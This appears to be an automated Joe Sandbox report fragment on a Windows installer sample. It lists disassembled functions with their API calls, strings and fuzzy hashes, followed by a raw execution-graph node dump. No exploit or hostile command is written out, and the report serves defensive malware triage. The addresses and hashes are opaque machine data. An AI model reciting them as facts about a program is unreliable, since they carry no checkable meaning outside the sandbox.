                                                                                                    • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                                                    • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                    • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                                                    Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • OleInitialize.OLE32(00000000), ref: 00405057
                                                                                                      • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                    • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                    • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                    • API String ID: 2266616436-4211696005
                                                                                                    • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                    • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                                                    • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                    • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                                                    Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDC.USER32(?), ref: 00402100
                                                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                    • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 1599320355-0
                                                                                                    • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                                                    • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                                                    • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                                                    • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                                                    Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                    • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                                                    • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                                                    • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                    • String ID: Version
                                                                                                    • API String ID: 512980652-315105994
                                                                                                    • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                    • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                                                    • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                    • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                                                    Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                                                    • GetTickCount.KERNEL32 ref: 00403303
                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                    • String ID:
                                                                                                    • API String ID: 2102729457-0
                                                                                                    • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                    • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                                                    • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                    • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                                                    Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 2883127279-0
                                                                                                    • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                    • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                                                    • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                    • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                                                    Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                    • String ID: HideWindow
                                                                                                    • API String ID: 1249568736-780306582
                                                                                                    • Opcode ID: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                                                                                    • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                                                    • Opcode Fuzzy Hash: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                                                                                    • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                                                    Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                    • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringlstrcmp
                                                                                                    • String ID: !N~
                                                                                                    • API String ID: 623250636-529124213
                                                                                                    • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                    • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                                                    • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                    • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                                                    Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                    Strings
                                                                                                    • Error launching installer, xrefs: 00405C48
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                    • String ID: Error launching installer
                                                                                                    • API String ID: 3712363035-66219284
                                                                                                    • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                    • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                                                    • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                    • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                                                    Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                    • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                      • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandlelstrlenwvsprintf
                                                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                    • API String ID: 3509786178-2769509956
                                                                                                    • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                    • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                                                    • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                    • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                                                    Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                                    • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                                    • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                    • String ID:
                                                                                                    • API String ID: 190613189-0
                                                                                                    • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                    • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                                                    • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                    • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:2.9%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:2.7%
                                                                                                    Total number of Nodes:2000
                                                                                                    Total number of Limit Nodes:47
                                                                                                    execution_graph 106724 f82f58 106725 f4280d 106724->106725 106726 f82f62 106724->106726 106752 f4286b 7 API calls 106725->106752 106756 f43dd1 106726->106756 106730 f82f6b 106732 f4a1d4 8 API calls 106730->106732 106734 f82f79 106732->106734 106733 f42817 106737 f43989 60 API calls 106733->106737 106743 f4282c 106733->106743 106735 f82fa8 106734->106735 106736 f82f81 106734->106736 106738 f459dc 8 API calls 106735->106738 106739 f459dc 8 API calls 106736->106739 106737->106743 106740 f82fa4 GetForegroundWindow ShellExecuteW 106738->106740 106741 f82f8c 106739->106741 106747 f82fd9 106740->106747 106745 f46aa4 8 API calls 106741->106745 106742 f42847 106749 f4284e SetCurrentDirectoryW 106742->106749 106743->106742 106746 f42f14 Shell_NotifyIconW 106743->106746 106748 f82f9a 106745->106748 106746->106742 106747->106742 106750 f459dc 8 API calls 106748->106750 106751 f42862 106749->106751 106750->106740 106763 f429bc 7 API calls 106752->106763 106754 f42812 106755 f4294b CreateWindowExW CreateWindowExW ShowWindow ShowWindow 106754->106755 106755->106733 106757 f822a0 __wsopen_s 106756->106757 106758 f43dde GetModuleFileNameW 106757->106758 106759 f4a1d4 8 API calls 106758->106759 106760 f43e04 106759->106760 106761 f43ff7 9 API calls 106760->106761 106762 f43e0e 106761->106762 106762->106730 106763->106754 106764 f954dc 106765 f6012b 8 API calls 106764->106765 106766 f954e3 106765->106766 106767 f6015b 8 API calls 106766->106767 106769 f954fc __fread_nolock 106766->106769 106767->106769 106768 f6015b 8 API calls 106770 f95521 106768->106770 106769->106768 106771 f78752 106776 f7850e 106771->106776 106775 f7877a 106781 f7853f try_get_first_available_module 106776->106781 106778 f7873e 106795 f72aac 26 API calls __fread_nolock 106778->106795 106780 f78693 106780->106775 106788 f80cd7 106780->106788 106787 f78688 106781->106787 106791 f6915b 40 API calls 2 library calls 106781->106791 106783 f786dc 106783->106787 106792 f6915b 40 API calls 2 library calls 106783->106792 106785 f786fb 106785->106787 106793 f6915b 40 API calls 2 library calls 106785->106793 106787->106780 106794 f72b68 20 API calls __dosmaperr 106787->106794 106796 f803d4 106788->106796 106790 f80cf2 106790->106775 106791->106783 106792->106785 106793->106787 106794->106778 106795->106780 106799 f803e0 ___scrt_is_nonwritable_in_current_image 106796->106799 106797 f803ee 106854 f72b68 20 API calls __dosmaperr 106797->106854 106799->106797 106800 f80427 106799->106800 106807 f809ae 106800->106807 106801 f803f3 106855 f72aac 26 API calls __fread_nolock 106801->106855 106806 f803fd __fread_nolock 106806->106790 106857 f80782 106807->106857 106810 f809f9 106875 f75571 106810->106875 106811 f809e0 106889 f72b55 20 API calls __dosmaperr 106811->106889 106814 f809e5 106890 f72b68 20 API calls __dosmaperr 106814->106890 106815 f809fe 106816 f80a1e 106815->106816 106817 f80a07 106815->106817 106888 f806ed CreateFileW 106816->106888 106891 f72b55 20 API calls __dosmaperr 106817->106891 106821 f8044b 106856 f80474 LeaveCriticalSection __wsopen_s 106821->106856 106822 f80a0c 106892 f72b68 20 API calls __dosmaperr 106822->106892 106824 f80ad4 GetFileType 106826 f80adf GetLastError 106824->106826 106827 f80b26 106824->106827 106825 f80aa9 GetLastError 106894 f72b32 20 API calls __dosmaperr 106825->106894 106895 f72b32 20 API calls __dosmaperr 106826->106895 106897 f754ba 21 API calls 2 library calls 106827->106897 106828 f80a57 106828->106824 106828->106825 106893 f806ed CreateFileW 106828->106893 106831 f80aed CloseHandle 106831->106814 106833 f80b16 106831->106833 106896 f72b68 20 API calls __dosmaperr 106833->106896 106835 f80a9c 106835->106824 106835->106825 106837 f80b47 106839 f80b93 106837->106839 106898 f808fe 72 API calls 3 library calls 106837->106898 106838 f80b1b 106838->106814 106843 f80bc0 106839->106843 106899 f804a0 72 API calls 4 library calls 106839->106899 106842 f80bb9 106842->106843 106844 f80bd1 106842->106844 106900 f789fe 106843->106900 106844->106821 106846 f80c4f CloseHandle 106844->106846 106915 f806ed CreateFileW 106846->106915 106848 f80c7a 106849 f80c84 GetLastError 106848->106849 106850 f80cb0 106848->106850 106916 f72b32 20 API calls __dosmaperr 106849->106916 106850->106821 106852 f80c90 106917 f75683 21 API calls 2 library calls 106852->106917 106854->106801 106855->106806 106856->106806 106858 f807bd 106857->106858 106859 f807a3 106857->106859 106918 f80712 106858->106918 106859->106858 106925 f72b68 20 API calls __dosmaperr 106859->106925 106862 f807b2 106926 f72aac 26 API calls __fread_nolock 106862->106926 106864 f807f5 106865 f80824 106864->106865 106927 f72b68 20 API calls __dosmaperr 106864->106927 106868 f80877 106865->106868 106929 f6da5d 26 API calls 2 library calls 106865->106929 106868->106810 106868->106811 106869 f80872 106869->106868 106872 f808f1 106869->106872 106870 f80819 106928 f72aac 26 API calls __fread_nolock 106870->106928 106930 f72abc 11 API calls _abort 106872->106930 106874 f808fd 106876 f7557d ___scrt_is_nonwritable_in_current_image 106875->106876 106933 f732ae EnterCriticalSection 106876->106933 106878 f75584 106879 f755a9 106878->106879 106884 f75617 EnterCriticalSection 106878->106884 106885 f755cb 106878->106885 106937 f75350 21 API calls 3 library calls 106879->106937 106882 f755f4 __fread_nolock 106882->106815 106883 f755ae 106883->106885 106938 f75497 EnterCriticalSection 106883->106938 106884->106885 106886 f75624 LeaveCriticalSection 106884->106886 106934 f7567a 106885->106934 106886->106878 106888->106828 106889->106814 106890->106821 106891->106822 106892->106814 106893->106835 106894->106814 106895->106831 106896->106838 106897->106837 106898->106839 106899->106842 106940 f75714 106900->106940 106902 f78a14 106953 f75683 21 API calls 2 library calls 106902->106953 106904 f78a0e 106904->106902 106905 f78a46 106904->106905 106907 f75714 __wsopen_s 26 API calls 106904->106907 106905->106902 106908 f75714 __wsopen_s 26 API calls 106905->106908 106906 f78a6c 106909 f78a8e 106906->106909 106954 f72b32 20 API calls __dosmaperr 106906->106954 106910 f78a3d 106907->106910 106911 f78a52 FindCloseChangeNotification 106908->106911 106909->106821 106914 f75714 __wsopen_s 26 API calls 106910->106914 106911->106902 106912 f78a5e GetLastError 106911->106912 106912->106902 106914->106905 106915->106848 106916->106852 106917->106850 106920 f8072a 106918->106920 106919 f80745 106919->106864 106920->106919 106931 f72b68 20 API calls __dosmaperr 106920->106931 106922 f80769 106932 f72aac 26 API calls __fread_nolock 106922->106932 106924 f80774 106924->106864 106925->106862 106926->106858 106927->106870 106928->106865 106929->106869 106930->106874 106931->106922 106932->106924 106933->106878 106939 f732f6 LeaveCriticalSection 106934->106939 106936 f75681 106936->106882 106937->106883 106938->106885 106939->106936 106941 f75721 106940->106941 106944 f75736 106940->106944 106955 f72b55 20 API calls __dosmaperr 106941->106955 106943 f75726 106956 f72b68 20 API calls __dosmaperr 106943->106956 106947 f7575b 106944->106947 106957 f72b55 20 API calls __dosmaperr 106944->106957 106947->106904 106948 f75766 106958 f72b68 20 API calls __dosmaperr 106948->106958 106949 f7572e 106949->106904 106951 f7576e 106959 f72aac 26 API calls __fread_nolock 106951->106959 106953->106906 106954->106909 